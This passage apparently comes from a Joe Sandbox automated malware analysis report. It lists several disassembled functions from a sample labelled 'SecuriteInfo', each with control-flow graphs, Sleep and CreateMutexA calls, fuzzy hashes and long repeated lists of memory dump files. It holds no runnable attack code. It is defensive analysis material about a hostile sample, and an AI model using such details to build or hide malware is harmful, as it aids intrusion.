                                                                                                      • Associated: 00000000.00000002.1887707800.0000000001118000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887744948.000000000111A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887786083.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887823253.0000000001129000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: cc44bd07afc31753a740106979a10b24e153119fcbeca7a4b7a04abf4a1c9efe
                                                                                                      • Instruction ID: 68cf1797e3a408a91b6054a294e27d0d34836566a1baeaa20c25a8b8654b18a1
                                                                                                      • Opcode Fuzzy Hash: cc44bd07afc31753a740106979a10b24e153119fcbeca7a4b7a04abf4a1c9efe
                                                                                                      • Instruction Fuzzy Hash: 473169717112009BEB08EF78DC997EDBB62EF86311F249218E429B73D2C7B589C08761
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00E19547 Relevance: 3.1, APIs: 2, Instructions: 129sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 670 e19547-e19560 673 e19562-e1956e 670->673 674 e1958e-e195aa 670->674 675 e19570-e1957e 673->675 676 e19584-e1958b call e2ecf8 673->676 677 e195d8-e195f7 674->677 678 e195ac-e195b8 674->678 675->676 681 e1a3e7 675->681 676->674 679 e19625-e1a3e6 call e29750 677->679 680 e195f9-e19605 677->680 683 e195ba-e195c8 678->683 684 e195ce-e195d5 call e2ecf8 678->684 686 e19607-e19615 680->686 687 e1961b-e19622 call e2ecf8 680->687 689 e1a423-e1a466 Sleep CreateMutexA 681->689 690 e1a3e7 call e482fa 681->690 683->681 683->684 684->677 686->681 686->687 687->679 690->689
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00E1A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,00E751D8), ref: 00E1A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1885216427.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885241101.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885371883.0000000000E79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885410128.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885438373.0000000000E87000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886119092.0000000000FD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886156330.0000000000FD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886289577.0000000001014000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886326423.0000000001016000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886355276.0000000001029000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886390792.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886430986.0000000001032000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886469194.000000000103D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886513828.0000000001052000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886550731.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886591341.000000000105E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886631945.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886671373.0000000001067000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886709527.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886752961.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886888194.000000000107B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886933792.0000000001088000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887009956.000000000108D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887062815.000000000108E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887100518.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887139267.0000000001092000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887178042.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887222344.00000000010AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887259907.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887296727.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887336233.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887394735.00000000010D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887514236.00000000010F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887552899.00000000010FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887591736.000000000110F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887630778.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887668666.0000000001112000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887707800.0000000001118000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887744948.000000000111A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887786083.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887823253.0000000001129000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 162ac639130e84165ef1ddc2577f1ff08da91c3f34e13180131ed9bcb5f47d83
                                                                                                      • Instruction ID: 0cda4bd40f7d1f8d97a1e6e0e19ef7622719ca2a548af50da97139082771427c
                                                                                                      • Opcode Fuzzy Hash: 162ac639130e84165ef1ddc2577f1ff08da91c3f34e13180131ed9bcb5f47d83
                                                                                                      • Instruction Fuzzy Hash: 533179717052048BFB18DB68DDD93FCBB62EB85315F249218E429BB3D6C77589C08761
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00E19A14 Relevance: 3.1, APIs: 2, Instructions: 128sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 700 e19a14-e19a34 704 e19a62-e19a7e 700->704 705 e19a36-e19a42 700->705 706 e19a80-e19a8c 704->706 707 e19aac-e19acb 704->707 708 e19a44-e19a52 705->708 709 e19a58-e19a5f call e2ecf8 705->709 712 e19aa2-e19aa9 call e2ecf8 706->712 713 e19a8e-e19a9c 706->713 714 e19af9-e1a3e6 call e29750 707->714 715 e19acd-e19ad9 707->715 708->709 710 e1a3fb 708->710 709->704 717 e1a423-e1a466 Sleep CreateMutexA 710->717 718 e1a3fb call e482fa 710->718 712->707 713->710 713->712 721 e19adb-e19ae9 715->721 722 e19aef-e19af6 call e2ecf8 715->722 718->717 721->710 721->722 722->714
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00E1A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,00E751D8), ref: 00E1A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1885216427.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885241101.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885371883.0000000000E79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885410128.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885438373.0000000000E87000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886119092.0000000000FD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886156330.0000000000FD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886289577.0000000001014000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886326423.0000000001016000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886355276.0000000001029000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886390792.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886430986.0000000001032000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886469194.000000000103D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886513828.0000000001052000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886550731.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886591341.000000000105E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886631945.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886671373.0000000001067000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886709527.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886752961.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886888194.000000000107B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886933792.0000000001088000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887009956.000000000108D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887062815.000000000108E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887100518.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887139267.0000000001092000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887178042.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887222344.00000000010AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887259907.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887296727.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887336233.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887394735.00000000010D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887514236.00000000010F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887552899.00000000010FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887591736.000000000110F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887630778.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887668666.0000000001112000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887707800.0000000001118000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887744948.000000000111A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887786083.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887823253.0000000001129000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: b61f3e91f88894138127928628f2ea1b5889f402ef6a96e8a89c760c678dd09f
                                                                                                      • Instruction ID: 65d23297f63bc6f95fa2e76df9108332b3d8e472ccb1e2447b64b96ceedcc158
                                                                                                      • Opcode Fuzzy Hash: b61f3e91f88894138127928628f2ea1b5889f402ef6a96e8a89c760c678dd09f
                                                                                                      • Instruction Fuzzy Hash: B23187727152408BEB0CDB78DC997ECB762EF86310F24A218E468BB3D2D77589C48721
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00E19B49 Relevance: 3.1, APIs: 2, Instructions: 127sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 731 e19b49-e19b69 735 e19b97-e19bb3 731->735 736 e19b6b-e19b77 731->736 739 e19be1-e19c00 735->739 740 e19bb5-e19bc1 735->740 737 e19b79-e19b87 736->737 738 e19b8d-e19b94 call e2ecf8 736->738 737->738 743 e1a400 737->743 738->735 741 e19c02-e19c0e 739->741 742 e19c2e-e1a3e6 call e29750 739->742 745 e19bc3-e19bd1 740->745 746 e19bd7-e19bde call e2ecf8 740->746 747 e19c10-e19c1e 741->747 748 e19c24-e19c2b call e2ecf8 741->748 750 e1a423-e1a466 Sleep CreateMutexA 743->750 751 e1a400 call e482fa 743->751 745->743 745->746 746->739 747->743 747->748 748->742 751->750
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00E1A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,00E751D8), ref: 00E1A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1885216427.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885241101.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885371883.0000000000E79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885410128.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885438373.0000000000E87000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886119092.0000000000FD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886156330.0000000000FD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886289577.0000000001014000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886326423.0000000001016000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886355276.0000000001029000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886390792.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886430986.0000000001032000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886469194.000000000103D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886513828.0000000001052000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886550731.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886591341.000000000105E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886631945.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886671373.0000000001067000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886709527.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886752961.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886888194.000000000107B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886933792.0000000001088000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887009956.000000000108D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887062815.000000000108E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887100518.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887139267.0000000001092000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887178042.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887222344.00000000010AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887259907.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887296727.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887336233.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887394735.00000000010D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887514236.00000000010F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887552899.00000000010FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887591736.000000000110F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887630778.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887668666.0000000001112000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887707800.0000000001118000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887744948.000000000111A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887786083.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887823253.0000000001129000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 36ca87f0d41285f1d614ebe6b5ad00755319bebc2c7466d0f58f4d3af266211c
                                                                                                      • Instruction ID: 29e6850e28bc8a298d44d1406df1b65ad42885b91bfa117ed0e1fbc36ec83c2d
                                                                                                      • Opcode Fuzzy Hash: 36ca87f0d41285f1d614ebe6b5ad00755319bebc2c7466d0f58f4d3af266211c
                                                                                                      • Instruction Fuzzy Hash: F83198717052448BEB08DB78EC89BECB7A2EBC6314F349218E025B73D2C7B599C08765
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00E19C7E Relevance: 3.1, APIs: 2, Instructions: 126sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 762 e19c7e-e19c9e 766 e19ca0-e19cac 762->766 767 e19ccc-e19ce8 762->767 768 e19cc2-e19cc9 call e2ecf8 766->768 769 e19cae-e19cbc 766->769 770 e19d16-e19d35 767->770 771 e19cea-e19cf6 767->771 768->767 769->768 776 e1a405 769->776 774 e19d63-e1a3e6 call e29750 770->774 775 e19d37-e19d43 770->775 772 e19cf8-e19d06 771->772 773 e19d0c-e19d13 call e2ecf8 771->773 772->773 772->776 773->770 779 e19d45-e19d53 775->779 780 e19d59-e19d60 call e2ecf8 775->780 782 e1a423-e1a466 Sleep CreateMutexA 776->782 783 e1a405 call e482fa 776->783 779->776 779->780 780->774 783->782
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00E1A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,00E751D8), ref: 00E1A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1885216427.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885241101.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885371883.0000000000E79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885410128.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885438373.0000000000E87000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886119092.0000000000FD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886156330.0000000000FD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886289577.0000000001014000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886326423.0000000001016000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886355276.0000000001029000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886390792.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886430986.0000000001032000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886469194.000000000103D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886513828.0000000001052000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886550731.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886591341.000000000105E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886631945.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886671373.0000000001067000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886709527.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886752961.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886888194.000000000107B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886933792.0000000001088000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887009956.000000000108D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887062815.000000000108E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887100518.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887139267.0000000001092000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887178042.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887222344.00000000010AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887259907.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887296727.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887336233.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887394735.00000000010D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887514236.00000000010F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887552899.00000000010FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887591736.000000000110F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887630778.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887668666.0000000001112000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887707800.0000000001118000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887744948.000000000111A000.00000080.00000001.01000000.00000003.sdmpDownload File
